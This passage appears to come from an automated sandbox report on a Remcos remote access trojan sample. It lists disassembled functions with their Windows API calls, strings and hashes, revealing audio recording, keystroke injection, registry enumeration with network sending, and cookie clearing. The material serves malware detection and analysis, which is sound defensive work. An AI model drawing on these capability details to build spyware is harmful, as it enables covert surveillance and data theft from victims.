                                                                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                              • API String ID: 3809562944-243156785
                                                              • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                              • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                              • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                              • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                              Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                              • int.LIBCPMT ref: 00410EBC
                                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                              • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                              • String ID: ,kG$0kG
                                                              • API String ID: 3815856325-2015055088
                                                              • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                              • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                              • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                              • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                              Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                              • waveInStart.WINMM ref: 00401CFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                              • String ID: dMG$|MG$PG
                                                              • API String ID: 1356121797-532278878
                                                              • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                                              • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                              • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                                              • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                              Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                              • TranslateMessage.USER32(?), ref: 0041D57A
                                                              • DispatchMessageA.USER32(?), ref: 0041D584
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                              • String ID: Remcos
                                                              • API String ID: 1970332568-165870891
                                                              • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                              • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                              • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                              • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                              Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                              • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                              • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                              • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                              Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                              • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                              • __alloca_probe_16.LIBCMT ref: 00454014
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                              • __freea.LIBCMT ref: 00454083
                                                              • __freea.LIBCMT ref: 0045408F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                              • String ID:
                                                              • API String ID: 201697637-0
                                                              • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                              • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                              • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                              • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                              Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                              • _free.LIBCMT ref: 00445515
                                                              • _free.LIBCMT ref: 0044552E
                                                              • _free.LIBCMT ref: 00445560
                                                              • _free.LIBCMT ref: 00445569
                                                              • _free.LIBCMT ref: 00445575
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                              • String ID: C
                                                              • API String ID: 1679612858-1037565863
                                                              • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                              • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                              • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                              • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                              Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tcp$udp
                                                              • API String ID: 0-3725065008
                                                              • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                              • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                              • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                              • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                              Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 004018BE
                                                              • ExitThread.KERNEL32 ref: 004018F6
                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                              • String ID: PkG$XMG$NG$NG
                                                              • API String ID: 1649129571-3151166067
                                                              • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                              • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                              • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                              • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                              Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                              • String ID: .part
                                                              • API String ID: 1303771098-3499674018
                                                              • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                              • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                              • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                              • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                              Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendInput.USER32 ref: 00419A25
                                                              • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                              • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InputSend$Virtual
                                                              • String ID:
                                                              • API String ID: 1167301434-0
                                                              • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                              • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                              • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                              • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                              Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16_free
                                                              • String ID: a/p$am/pm$h{D
                                                              • API String ID: 2936374016-2303565833
                                                              • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                              • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                              • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                              • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                              Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              • _free.LIBCMT ref: 00444E87
                                                              • _free.LIBCMT ref: 00444E9E
                                                              • _free.LIBCMT ref: 00444EBD
                                                              • _free.LIBCMT ref: 00444ED8
                                                              • _free.LIBCMT ref: 00444EEF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID: KED
                                                              • API String ID: 3033488037-2133951994
                                                              • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                              • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                              • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                              • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                              Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Enum$InfoQueryValue
                                                              • String ID: [regsplt]$xUG$TG
                                                              • API String ID: 3554306468-1165877943
                                                              • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                              • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                              • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                              • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                              Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                                • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                              • String ID: xUG$NG$NG$TG
                                                              • API String ID: 3114080316-2811732169
                                                              • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                              • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                              • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                              • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                              Function 004511AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                                              • __alloca_probe_16.LIBCMT ref: 00451231
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                                              • __freea.LIBCMT ref: 0045129D
                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                              • String ID: PkGNG
                                                              • API String ID: 313313983-263838557
                                                              • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                              • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                              • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                              • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                              Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                              • _wcslen.LIBCMT ref: 0041B7F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                              • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                              • API String ID: 37874593-122982132
                                                              • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                              • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                              • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                              • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                              Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                              • API String ID: 1133728706-4073444585
                                                              • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                              • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                              • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                              • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                              Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
